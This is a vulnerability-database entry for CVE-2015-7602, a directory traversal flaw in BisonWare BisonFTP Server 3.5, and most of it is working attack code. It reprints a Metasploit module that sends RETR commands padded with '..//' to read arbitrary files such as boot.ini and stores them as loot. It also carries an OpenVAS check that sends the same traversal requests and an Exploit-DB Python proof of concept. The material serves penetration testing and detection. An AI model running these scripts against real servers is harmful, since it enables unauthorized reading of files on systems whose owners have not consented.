BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08T05:34:10
ID MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL Type metasploit Reporter Rapid7 Modified 2020-10-02T20:00:37
Description
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
by crafting a RETR command including file system traversal strings such as '..//.'
},
'Platform' => 'win',
'Author' =>
[
'Jay Turla', # @shipcod3, msf and initial discovery
'James Fitts',
'Brad Wolfe <brad.wolfe[at]gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '38341'],
[ 'CVE', '2015-7602']
],
'DisclosureDate' => '2015-09-28'
))
register_options(
[
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
])
end
def check_host(ip)
begin
connect
if /BisonWare BisonFTP server product V3\.5/i === banner
return Exploit::CheckCode::Appears
end
ensure
disconnect
end
Exploit::CheckCode::Safe
end
def run_host(target_host)
begin
connect_login
sock = data_connect
# additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
# and #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
else
file_path = datastore['PATH']
file = ::File.basename(file_path)
# make RETR request and store server response message...
retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
res = send_cmd( ["RETR", retr_cmd])
# read the file data from the socket that we opened
# dont assume theres still a sock to read from. Per #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
return
else
# read the file data from the socket that we opened
response_data = sock.read(1024)
end
unless response_data
print_error("#{file} not found")
return
end
if response_data.length == 0
print_status("File (#{file_path})from #{peer} is empty...")
return
end
# store file data to loot
loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
vprint_status("Data returned:\n")
vprint_line(response_data)
print_good("Stored #{file_path} to #{loot_file}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
vprint_error(e.message)
elog(e)
rescue ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
elog(e)
ensure
data_disconnect
disconnect
end
end
end
{"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2020-10-02T20:00:37", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2020-10-07T22:01:15", "viewCount": 172, "enchantments": {"score": {"value": 5.7, "vector": "NONE", "modified": "2020-10-07T22:01:15", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-7602"]}, {"type": "exploitdb", "idList": ["EDB-ID:38341"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805753"]}], "modified": "2020-10-07T22:01:15", "rev": 2}, "vulnersScore": 5.7}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => '2015-09-28'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, relative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(e)\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(e)\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2020-10-03T12:49:55", "description": "Directory traversal vulnerability in BisonWare BisonFTP 3.5 allows remote attackers to read arbitrary files via a ../ (dot dot slash) in a RETR command.", "edition": 3, "cvss3": {}, "published": "2015-09-29T19:59:00", "title": "CVE-2015-7602", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7602"], "modified": "2015-10-13T16:52:00", "cpe": ["cpe:/a:bisonware:bisonftp:3.5"], "id": "CVE-2015-7602", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7602", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:bisonware:bisonftp:3.5:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:36:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-7602"], "description": "This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.", "modified": "2019-02-07T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310805753", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805753", "type": "openvas", "title": "BisonWare BisonFTP Server Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_bisonware_bisonftp_server_dir_trav_vuln.nasl 13517 2019-02-07 07:51:12Z mmartin $\n#\n# BisonWare BisonFTP Server Directory Traversal Vulnerability\n#\n# Authors:\n# Deependra Bapna <bdeependra@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bisonware:bison_ftp_server\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805753\");\n script_version(\"$Revision: 13517 $\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-07 08:51:12 +0100 (Thu, 07 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 12:41:58 +0530 (Tue, 29 Sep 2015)\");\n script_cve_id(\"CVE-2015-7602\");\n script_name(\"BisonWare BisonFTP Server Directory Traversal Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running BisonWare BisonFTP Server\n and is prone to directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send the crafted directory traversal attack\n request and check whether it is able to read the system file or not.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in handling of\n file names. It does not properly sanitise filenames containing directory traversal\n sequences that are received from an FTP server.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attackers\n to read arbitrary files on the affected application.\");\n\n script_tag(name:\"affected\", value:\"BisonWare BisonFTP Server version 3.5.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/38341\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"gb_bisonware_bisonftp_server_detect.nasl\");\n script_mandatory_keys(\"BisonWare/Ftp/Installed\");\n script_require_ports(\"Services/ftp\", 21);\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = get_app_port(cpe:CPE);\nif(!ftpPort){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc){\n exit(0);\n}\n\nkb_creds = ftp_get_kb_creds();\nuser = kb_creds[\"login\"];\npass = kb_creds[\"pass\"];\n\nlogin_details = ftp_log_in(socket:soc, user:user, pass:pass);\nif(!login_details)\n{\n close(soc);\n exit(0);\n}\n\nftpPort2 = ftp_get_pasv_port(socket:soc);\nif(!ftpPort2)\n{\n close(soc);\n exit(0);\n}\n\nsoc2 = open_sock_tcp(ftpPort2, transport:get_port_transport(ftpPort));\nif(!soc2)\n{\n close(soc);\n exit(0);\n}\n\nfiles = traversal_files( \"Windows\" );\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n file = \"../../../\" + file;\n req = string(\"RETR \", file);\n send(socket:soc, data:string(req, \"\\r\\n\"));\n\n res = ftp_recv_data(socket:soc2);\n\n if( res && match = egrep( string:res, pattern:\"(\" + pattern + \"|\\WINDOWS)\", icase:TRUE ) ) {\n report = \"Used request: \" + req + '\\n';\n report += \"Received data: \" + match;\n security_message(port:ftpPort, data:report);\n close(soc2);\n close(soc);\n exit(0);\n }\n}\n\nclose(soc);\nclose(soc2);", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}}], "exploitdb": [{"lastseen": "2016-02-04T07:52:44", "description": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability. CVE-2015-7602. Remote exploit for windows platform", "published": "2015-09-28T00:00:00", "type": "exploitdb", "title": "BisonWare BisonFTP Server 3.5 - Directory Traversal Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-7602"], "modified": "2015-09-28T00:00:00", "id": "EDB-ID:38341", "href": "https://www.exploit-db.com/exploits/38341/", "sourceData": "#!/usr/bin/python\r\n# title: BisonWare BisonFTP server product V3.5 Directory Traversal Vulnerability\r\n# author: Jay Turla <@shipcod3>\r\n# tested on Windows XP Service Pack 3 - English\r\n# software link: https://www.exploit-db.com/apps/081331edfc143738a60e029192b5986e-BisonFTPServer.rar\r\n# description: BisonWare BisonFTP server product V3.5 is vulnerable to Directory Traversal (quick and dirty code just for PoC) \r\n\r\nfrom ftplib import FTP\r\n\r\nftp = FTP(raw_input(\"Target IP: \")) \r\nftp.login() \r\nftp.retrbinary('RETR ../../../boot.ini', open('boot.ini.txt', 'wb').write)\r\nftp.close()\r\nfile = open('boot.ini.txt', 'r')\r\nprint \"[**] Printing what's inside boot.ini\\n\"\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\nprint file.read()\r\nprint \"@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\"\r\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/38341/"}]}